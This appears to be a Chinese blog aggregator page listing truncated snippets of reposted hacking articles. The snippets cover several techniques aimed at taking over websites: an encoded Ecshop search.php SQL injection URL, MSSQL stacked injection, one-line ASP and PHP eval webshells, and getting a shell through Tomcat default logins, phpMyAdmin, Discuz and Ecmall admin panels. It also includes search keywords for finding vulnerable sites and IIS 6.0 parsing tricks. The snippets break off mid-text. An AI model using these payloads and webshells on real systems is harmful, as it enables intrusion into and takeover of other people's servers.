这个是search.php exp 变种
search.php?
encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uI
转载
精选
2011-01-21 19:09:59
2817阅读
一 前言菜鸡第一次实战中碰到mssql的堆叠注入,大佬们轻喷。本来对堆叠注入没啥了解,这次正巧碰到mssql的堆叠注入,正好加强一下对堆叠注入的理解。二、 堆叠注入因为在sql查询语句中, 分号“;”代表查询语句的结束,所以在执行sql语句结尾分号的后面,再加一条sql语句,就造成了堆叠注入。这种情况很像联合查询,他们的区别就在于联合查询执行的语句是有限的,只能用来执行查询语句,而堆叠注入可以执行
飞鸟游鱼原创
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
2.写入配置文件一句话木马,如果过滤了,(,)可尝试<%eval
request("value")%>来突破,例如
config.asp
转载
精选
2009-09-24 02:19:02
1953阅读
点赞
飞鸟游鱼原创
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
2.写入配置文件一句话木马,如果过滤了,(,)可尝试<%eval
request("value")%>来突破,例如
config.asp
转载
2010-08-10 22:36:04
416阅读
 
文章没什么意思,唯一亮点就在于dz后台拿shell,不过也全文贴过来吧,图片不全贴了麻烦,就贴2张。Blog:http://hi.baidu.com/zhenker这几天心情很烦躁,于是想找个黑客网站检测下,百度搜到了饭客网,论坛是DZ的,手中没0day,杯具,习惯性的用我自己的明小子扫下,看能扫到啥能利用的,扫了半天扫到了一个很有利用价值的文件如下图:上次跟小凯搞一个黑客站的时候
转载
精选
2010-11-16 16:36:35
746阅读
有些Tomcat安装之后没有修改默认密码(用户名admin,密码为空),这样就可以直接登录进去。有两个目录可以访问:/admin/manager/html
/admin 目录下的利用:Service–host–actions–Create New Context建立虚拟目录Document Base填你想浏览的目录,比如c:\,Path自己随便写,例如/guizai然后直接http://ip/g
转载
2010-03-24 18:12:54
503阅读
正学习后台拿Shell的方法,今天碰巧在网上看见得到后台拿shell的汇总全集,很不错的总结,分享了!版主给个精华吧!
今天带给大家的都是些技术上的总结,有些人老问经验怎么来的,这个就是经验,希望大家都能成为脚本高手.
动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞
转载
精选
2011-02-08 21:01:10
538阅读
发现了个PHPMYADMIN 结果弱口令登陆进去 爆出绝对路径 然后执行SQL语句发现导出SHELL的时候却发现缺少了import.php这个文件 结果没办法执行MYSQL语句! 然后本地测试了下 发现另外的方法
==========================================
phpMyAdmin/sql.php?db=test&ta
转载
精选
2011-03-01 15:41:07
778阅读
今天在 中国被黑站点统计系统 上看到别人拿的一个站,就顺便练习了一下,让大家见笑了,高手飘过,请大家多多指教,谢谢,具体请看附件。
原创
2011-04-02 14:08:07
420阅读
进后台直奔扩展->挂件管理,下面的每一个挂件都对应着Php文件~拿第一个最新成交挂件举例,直接点击编辑脚本,写你的一句话,然后连接external\widgets\latest_sold\main.widget.php~OK~结束
~另外说下Ecmall现在公布的那个2.2延迟注射其实不用那么麻烦~直接爆错注入就可以了~虽然Ecmall发生错误时会自动跳转到上一页~但是那点儿时
原创
2011-05-21 12:03:30
1594阅读
方法一:CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POS
翻译
精选
2013-06-21 11:09:57
1343阅读
文件参数Shell命令注入1.问题信息可能会在web服务器上运行远程命令,未对用户输入正确执行危险字符清理,存在操作系统命令注入的至少以下两种子类型:应用程序计划使用外部提供的输入作为参数,执行受其控制的单个固定程序。例如,使用nslookup命令探测DNS域传送漏洞,appscan工具官方描述:程序可能使用 system("nslookup [HOSTNAME]") 来运行 nslookup,并
转载
2021-05-04 22:42:50
1242阅读
2评论
注入拿站关键字整理(超全)关键字:Power WenDay Ver1.0添加: /db/PW_SYS_Data.mdb关键字:powered by WEBBOY添加: /upfile.asp 关键字:Powered By :SMT Version 5.0添加: /bbs/upfile.asp /upfile_flash.asp 关键字:team5 studio all rights reserve
转载
精选
2013-07-16 10:44:23
2009阅读
0x01判断数据 ①判断数据库类型 and exists (select * from sysobjects)--返回正常为mssql(也名sql server) and exists (select count(*) from sysobjects)--有时上面那个语句不行就试试这个哈 ②判断数据
原创
2021-07-17 16:30:16
110阅读
我记得以前看过这个资料,千翻万找总算翻了出来。
这个前提是可以编辑模板,不然我估计是没什么希望了。
templates/default/actions.lang.php(以这个为例)
在最底那提交
游客\');?>
\'g\'=>\'sdfsdf
便能写入一句话木马并正常执行.
原创
2007-12-08 15:38:00
1700阅读
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:fhod
帝国备份王(Empirebak)简介
EmpireBak是一款完全免费、专门为Mysql大数据的备份与导入而设计的软件,系统采用分卷备份与导入,理论上可备份任何大小的数据库.
可在 http://www.phome.net/ebak2008os/ 下载到
默认账号密码为
admin 
转载
精选
2011-01-24 19:49:59
1587阅读
直接上传拿shell
注入地址如下:
http://www.bjqingyu.com/letter/show.asp?id=553
没有防注入程序的防护
直接丢到啊D中扫描
得到用户名和密码
下面扫描 后台
http://www.bjqingyu.com/user/login.asp
顺利的登录进去,呵呵,连MD5加密都没有,太方便了
点击
原创
2011-04-02 18:46:54
930阅读
一、IIS 6.0解析漏洞IIS 6.0解析利用方法有两种1.目录解析/xx.asp/xx.jpg2.文件解析wooyun.asp;.jpg第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。例如创建目录 wooyun.asp,那么/wooyun.asp/1.jpg将被当作asp文件来执行。假设黑阔可以...
转载
2018-11-18 23:55:55
189阅读
0X01简介 这里我本来想学习 msf利用漏洞反弹shell的 但是 没有靶机....等找了靶机在弄吧 kali 172.18.5.118 靶机 172.18.5.240 先尝试能不能ping通 好的可以 那我们进行下一步 0X01爱之初体验 先在kali终端输入msfvenom -l,打开payl
原创
2021-07-17 16:23:08
828阅读
